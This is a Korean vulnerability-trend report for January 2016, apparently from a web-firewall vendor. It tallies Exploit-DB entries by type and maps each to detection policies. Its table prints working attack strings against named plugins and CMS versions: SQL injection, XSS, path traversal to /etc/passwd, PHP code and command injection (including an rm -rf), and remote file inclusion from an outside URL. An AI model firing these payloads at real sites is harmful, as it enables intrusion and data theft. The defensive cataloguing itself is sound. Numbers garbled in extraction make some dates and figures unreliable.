** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

Similar documents
EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun

EDB 분석보고서 (04.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

EDB 분석보고서 (06.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 File Upload 하 C

76 XSS 하 Huge-IT Slider admin.php XSS

EDB 분석보고서 (04.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj

EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu

EDB 분석보고서 (06.07) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취

36802 Tune Library / 중 NEX-Forms < admin-ajax.php 하 중 Ultimate Product Catalogue - / 하 중 Ultimate Product Catalogue - ad

EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다 SQL Injection 하 상 u5cms localize.php SQL U5cms 3607 SQL

날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 Directory Traversal 하 EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된취약

EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Smart Google Code Inserter < 3.5 P

EDB 분석보고서 (05.08) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 7/08/ File Upload 하중.

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 PHP Imagick / command injection 취약점 /image.j

POST /process.php HTTP/ XSS 중중 Command Injection 상상 EPESI.8.2 rev XSS ClipBucket Remote Code Execution

3708 하 중 Landing Pages Plugin post.php 3708 XSS 하 중 Landing Pages Plugin post-new.php 3707 하 중 NewStatPress Plugin admin.php 3707

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 /picosafe_webgui/webint

0125_ 워크샵 발표자료_완성.key

PowerPoint Template

PowerPoint プレゼンテーション

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

第 1 節 組 織 11 第 1 章 檢 察 의 組 織 人 事 制 度 등 第 1 項 大 檢 察 廳 第 1 節 組 대검찰청은 대법원에 대응하여 수도인 서울에 위치 한다(검찰청법 제2조,제3조,대검찰청의 위치와 각급 검찰청의명칭및위치에관한규정 제2조). 대검찰청에 검찰총장,대

Observational Determinism for Concurrent Program Security

제목 레이아웃

PowerPoint Presentation

³»Áö¼öÁ¤

fashion jewelry 시장성 조사

1

< FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

슬라이드 1

WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진

Microsoft Word - junior.docx

2015

취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환

< F33BFF920C0CEC5CDB3DD20C4A7C7D8BBE7B0ED20B5BFC7E220B9D720BAD0BCAEBFF9BAB828C3D6C1BEBABB292E687770>

내지무인화_

웃음 지기 이기준 2014년 봄호 10 년간의 사랑 이야기 마리루시 수녀 그리스도의 교육수녀회 관구장 여 는 글 Contents 여는글 I 10년간의 사랑 이야기 1 아동학대 현황보고 2 사업 I 교육 사업 3 홍보 사업 5 자원발 사업 5 그룹홈 6 햇살가득그룹홈 이

게시판 스팸 실시간 차단 시스템

untitled

레이아웃 1

±¹Á¦ÆòÈŁ4±Ç1È£-ÃÖÁ¾

Secure Programming Lecture1 : Introduction

Research & Technique WordPress RCE 취약점 (CVE /CVE &CVE ) 취약점개요 WordPress는현재가장많이사용되고있는오픈소스콘텐츠관리시스템 (CMS, Content Management S

인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 183.8

PowerPoint 프레젠테이션

` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10

월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부

SKINFOSEC-CHR-028-ASP Mssql Cookie Sql Injection Tool 분석 보고서.doc

SKINFOSEC_TECH_005_China Bot_가칭_ 악성코드 분석_v0.3.doc

가톨릭교회에서 이야기하는 사랑이란? 정재우 신부 가톨릭대학교 생명대학원 모든 사람은 수단이나 도구로 삼아지는 것 이 아니라 목적으로 존중 받고 존경 받아야 한다. 이것은 사람과 사람의 만남에 기본적인 모 습이라 할 수 있다. 그리고 남자와 여자의 관 계, 몸과 몸의 만

AhnLab_template

슬라이드 1

월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부

< B3E220C3D1C8B8B9DFC7A5C0DAB7E1C1FD312E687770>

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 3 - 유포지탐지현황 3 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 5 - 악성코드유형별비율 6 - 위협 IP/ 도메인현황 7 2

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

Ç¥Áö

I II III IV 웹방화벽의필요성 WAPPLES 위치 인증및수상현황 2

Page 1 / 솔루션소개 Magento Magento 는강력한기능을제공하는오픈소스쇼핑몰제작관리도구입니다. 커스터마이징가 능한글로벌쇼핑몰구축시에사용을권장하며, 자체마켓플레이스를보유하고있을정도 로다양한기능을유 / 무료로추가할수있습니다. 2. 설치버전 하기명시된

(......).hwp

Social Network

Analyst Briefing

2007 상반기 실적회의 - DRM Extension

CMS-내지(서진이)

mytalk

산업백서2010표지

°øÁÖ´ëÇб³Ãѵ¿Ã¢È¸º¸ 63È£

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D D382E687770>

Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3

PowerPoint 프레젠테이션

MySQL-Ch05

Inside Android Applications

20주년용

HTML5가 웹 환경에 미치는 영향 고 있어 웹 플랫폼 환경과는 차이가 있다. HTML5는 기존 HTML 기반 웹 브라우저와의 호환성을 유지하면서도, 구조적인 마크업(mark-up) 및 편리한 웹 폼(web form) 기능을 제공하고, 리치웹 애플리케이 션(RIA)을

EDB 분석보고서 (05.03) ~ Exploit-DB( 에공개된별로분류한정보입니다 상 상 Spider FAQ - index.php 상 Gallery WD - index.php 36

6강.hwp


슬라이드 1

슬라이드 1

goyong1003_36p

취약점분석보고서 [CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit] RedAlert Team_ 강동우

Microsoft PowerPoint - web-part03-ch19-node.js기본.pptx

<443A5CB1E8C7F6C1D85CB1E8C7F6C1D85FB0E6B8AE5CBDC5B0E8BEE0BCADB7F95C F492E2E2E5F53724D E A5A >

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일

3장

설명 Description 상세정보 네이버에서운영하는서비스중하나인쥬니어네이버 ( 이하쥬니버 ) 에서는쥬니버서비스와 관련하여도움을주기위한 [ 그림 1] 과같은플래시애플리케이션이서비스되고있다.[2] [ 그림 1] 쥬니어네이버에서서비스중인쥬니버도우미플래시애플리케이션 해당플래

PowerPoint 프레젠테이션

Page 1 / 솔루션소개 WordPress WordPress는세계에서가장인기있는오픈소스웹사이트제작관리도구입니다. 웹표준, 접근성, SEO( 검색엔진최적화 ) 등의강점이있으며다양한테마와확장기능을제공합니다. 2. 설치버전 하기명시된버전은권장설치버전이며필요시다른

???? 1

HTML5* Web Development to the next level HTML5 ~= HTML + CSS + JS API

Microsoft PowerPoint 세션.ppt

Microsoft Word - Blind Sql Injection.doc

개인정보처리(취급)방침 | 신라스테이(주) HUB

PowerPoint Template

페이지 2 / 9 목차 개요웹취약점분류점검결과해결방안 주의사항 : 빛스캔 ( 주 ) 의취약성검사가대상웹사이트의취약점을 100% 진단하지못할가능성이있으며, 원격에서탐지 하는점검의특성상오탐지 (False Positive) 할가능성이있으므로충분한검토과정



PowerPoint Presentation

Microsoft PowerPoint - file


Transcription:

EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 016 년 1 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가가장많았습니다. 분석된 SQL Injection 공격들은공격난이도면에서는단순히공격의성공여부를묻는쿼리를사용하여공격이이루어지는난이도가낮은공격들이대부분이었으나, 그위험도면에서는모두높은공격들이었습니다. 해당취약점이발견된소프트웨어를사용하는관리자는대모듈및플러그인에입력값검증을좀더엄격하게하는보안패치및시큐어코딩을실시하여 SQL Injection 공격에노출되지않도록주의하여야겠습니다. SQL Injection 이외에최근들어 Code Injection 과관련한취약점이주기적으로나타나고있습니다. PHP Code Injection 은 SQL Injection 과 Command Injection 에비해대적으로위험도가낮은취약점에속하지만여전히수많은웹사이트가 PHP 로이루어져있어 PHP 해당사이트는 Code Injection 에쉽게노출될수있습니다. PHP Code Injection 역시 SQL Injection 과마찬가지로사용자의입력값을엄격하게검증하여악의적인코드가실행되지않도록주의하여야겠습니다. 1. 취약점별보고개수취약점 보고개수 LFI 1 Command Injection 1 Code Injection 1 RFI XSS 8 SQL Injection 15 총합계 8 16 1 1 10 8 6 1 1 1 취약점별보고개수 8 15 0 LFI Command Injection Code Injection RFI XSS SQL Injection. 위험도별분류 위험도 보고개수 백분율 7 5.00% 1 75.00% 합계 8 100.00% 위험도별분류 7 1 3. 공격난이도별현황공격난이도 보고개수 백분율 7.1% 1.9% 하 78.57% 총합계 8 100.00% 공격난이도별현황 하. 주요소프트웨어별취약점발생현황 소프트웨어이름 보고개수 3 CMS Forum Ramui webblog SeaWell Networks 1 총합계 8 주요소프트웨어별취약점발생현황 1 CMS Forum Ramui webblog 3 SeaWell Networks

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 WAPPLES 정책 016-01-0 39150 SQL Injection 하 016-01-0 39150 SQL Injection 하 016-01-0 39150 SQL Injection 하 015-01-0 39150 SQL Injection 하 016-01-05 39171 XSS 하 software_add_license.php SQL delete_system.php SQL list_viewdef_software_for_syst em.php SQL system_export.php SQL EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 1.1.010 - logincheck.php XSS 취약점 /software_add_license.php?id=1%0and%01=1-- /delete_system.php?pc=1%0and%01=1-- /list_viewdef_software_for_system.php?pc=1%0and% 01=1-- /system_export.php?pc=1%0and%01=1-- POST /phpipam/site/login/logincheck.php HTTP/1.1 ipamusername=<script>alert("rxss01")</script>&ipampa ssword=xxx 1.1.010 016-01-05 39171 XSS 하 1.1.010 - logincheck.php XSS 취약점 POST /phpipam/site/login/logincheck.php HTTP/1.1 1.1.010 ipamusername=<script>alert("rxss01")</script>&ipampa ssword=xxx 016-01-05 39168 SQL Injection 하 - manage-profile.php SQL POST /manage-profile.php HTTP/1.1 email=1' and 1=1-- 016-01-05 39168 SQL Injection 하 POST /registeracc.php HTTP/1.1 - registeracc.php SQL Injection 취 약점 email=tester%0wics.com' or updatexml(,concat(0x7e,(version())),0) or' 016-01-05 39168 XSS 하 - manage-profile.php XSS POST /manage-profile.php HTTP/1.1 firstname=wics&lastname=wics&email=<script>alert(doc ument.location)</script>&password=admin&confirmpass word=admin&update=update+profile 016-01-05 39168 XSS 하 POST /registeracc.php HTTP/1.1 - registeracc.php XSS Injection 취 약점 firstname=wics&lastname=wics&email=<script>alert(1);< /script>&password=admin&confirmpassword=admin&up date=update+profile 016-01-08 390 XSS 하 POST /wps_usermeta_shortcodes.php HTTP/1.1 WP Symposium Pro Social Network Plugin 15.1 - wps_usermeta_shortcodes.php XSS 취약점 WP Symposium Pro Social Network Plugin 15.1 wpspro_country="><script>alert("1")</script><"

EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 날짜 EDB번호 취약점분류 공격난이도 공격위험도 취약점이름 핵심공격코드 대프로그램 대환경 WAPPLES 정책 POST /doms/discoveryqueue/kill.php HTTP/1.1 016-01-1 393 Code Injection 하 NMS <= 5.3.6.0 - NMS kill.php Code <= 5.3.6.0 미탐 pids[]=echo phpinfo(); 016-01-1 393 Command Injection NMS <= 5.3.6.0 - kill.php Command POST /doms/discoveryqueue/kill.php HTTP/1.1 NMS <= 5.3.6.0 Stealth Commanding - 외부프로그램실행시도탐지 pids[]=python /tmp/sess_ap6k1d1ucbetfk9fhcqdnk0be5; rm -rf /tmp/sess_ap6k1d1ucbetfk9fhcqdnk0be5 016-01-15 396 SQL Injection.xls Bitrix Module 6.5. - _xls_import.php SQL /bitrix/admin/_xls_import.php?del_prof_real=1&xls _profile=%7%0or%01=(select%0load_file(conc AT(CHAR(9),CHAR(9),(select%0version()),CHAR(6), CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99), CHAR(107),CHAR(101),CHAR(11),CHAR(6),CHAR(99),CHAR(111),CHAR(109),CHAR(9),CHAR(10),CHAR(11 1),CHAR(111),CHAR(98),CHAR(97),CHAR(11))))+--+.xls Bitrix Module 6.5. 016-01-15 396 SQL Injection.xls Bitrix Module 6.5. - _xls_import_step_.php SQL /admin/_xls_import_step_.php?save_profile=y&m ake_translit_code=y&xls_iblock_id=0,0,0,0,0,0,0,0,0,(sel ect%0load_file(concat(char(9),char(9),(select% 0version()),CHAR(6),CHAR(97),CHAR(116),CHAR(116 ),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(11 ),CHAR(6),CHAR(99),CHAR(111),CHAR(109),CHAR(9 ),CHAR(10),CHAR(111),CHAR(111),CHAR(98),CHAR( 97),CHAR(11))))%9+-- +&xls_iblock_section_id=0&xls_identify=0&firstrow=0 &titlerow=0&firstcolumn=0&highestcolumn=0&xls_gl OBALS=0&sku_iblock_id=1&cml_link_code=1&xls_ibloc k_section_id_new=0.xls Bitrix Module 6.5. 016-01-18 3966 LFI 하 SeaWell Networks Spectrum - /configure_manage.php?action=download_config&file=.. configure_manage.php LFI 취약 /../../../../../../../../etc/passwd 점 SeaWell Networks SeaWell Networks Spectrum Stealth Commanding- 사용자정의 - 대경로탐지 016-01-18 3963 RFI 하 Forum 1.0.9 - index.php RFI 취약점 POST /index.php?act=admin&adact=skin&seadact=import HTTP/1.1 Forum Forum 1.0.9 Include Injection - 파일 Include 탐지 folderpath=../&importtype=&weburl=http://hyp3rlinx.al tervista.org/evil.zip&filepath=../&uploadtheme=&imports kin=import 016-01-18 396 XSS 하 Forum 1.0.9 - index.php XSS 취약점 POST /index.php?act=admin&adact=skin&seadact=import HTTP/1.1 Forum Forum 1.0.9 fredirect="/><script>alert("xss hyp3rlinx \n\n" + document.cookie)</script> 016-01-5 39309 SQL Injection Booking Calendar /wordpress/wp-admin/adminajax.php?action=cpabc_appointments_check_ipn_verifica Contact Form Plugin <=1.1.3 - admin-ajax.php SQL Injection tion&cpabc_ipncheck=1&itemnumber=(select * FROM 취약점 (SELECT(SLEEP(5)))Qmyx) Booking Calendar Contact Form Plugin <=1.1.3 016-01-7 393 XSS 하 WordPress Booking Calendar Contact Form <=1.1. - admin.php XSS 취약점 /wpadmin/admin.php?page=cpabc_appointments&ac=st&ch s=utf- 8&ict=%%3E%3Cimg+src%3Dx+onerror%3Dalert% 81%9%3E&ics=%%3E%3Cimg+src%3Dx+onerror %3Dalert%81%9%3E&scr=1 WordPress Booking Cross Site Scripting-사 Calendar 용자정의-이미지태그 Contact Form <=1.1. 016-01-7 39339 SQL Injection 016-01-7 39339 XSS 하 016-01-8 39355 RFI 하 jquery CMS. - gallery1.php SQL jquery CMS. - gallery1.php XSS 취약점 Ramui Web Hosting Directory Script.0 - connection.php RFI 취약점 /user/gallery1.php?g_name=1%7%0union%0all% 0select%01,,3,group_concat%8version%8%9% 9,5--+ /user/gallery1.php?g_name=%3cscript%3ealert%8% XSS%%9%3C/script%3E /gb/include/connection.php?root=http://test.com.index. php CMS CMS Ramui webblog jquery CMS. jquery CMS. Ramui Web Hosting Directory Script.0 Include Injection - 파일 Include 탐지

EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 WAPPLES 정책 016-01-8 3935 SQL Injection 하 016-01-9 39385 SQL Injection Ramui Forum Script 9.0 - page.php SQL /gb/include/page.php?pagename=1%0and%01=1-- Ramui webblog r58 - managefiles.php SQL POST /manage-files.php?client_id=1 HTTP/1.1 status=10' and 0 union select 0,1,'0) or 1 union select 0,1,concat(user,char(3),password),3,,5,6,7,8,9 from tbl_users -- a',3,,5,6,'7 Ramui Forum Script 9.0 r58 016-01-9 39385 SQL Injection 하 r58 - clients.php SQL POST /clients.php HTTP/1.1 r58 status=1' and 1=1-- 016-01-9 39385 SQL Injection 하 r58 - rocess-zipdownload.php SQL /rocess-zip-download.php?file=1%7%0and%01=1-- %0 r58 016-01-9 39385 SQL Injection 하 r58 - homelog.php SQL /home-log.php?action=1%7%0and%01=1--%0 r58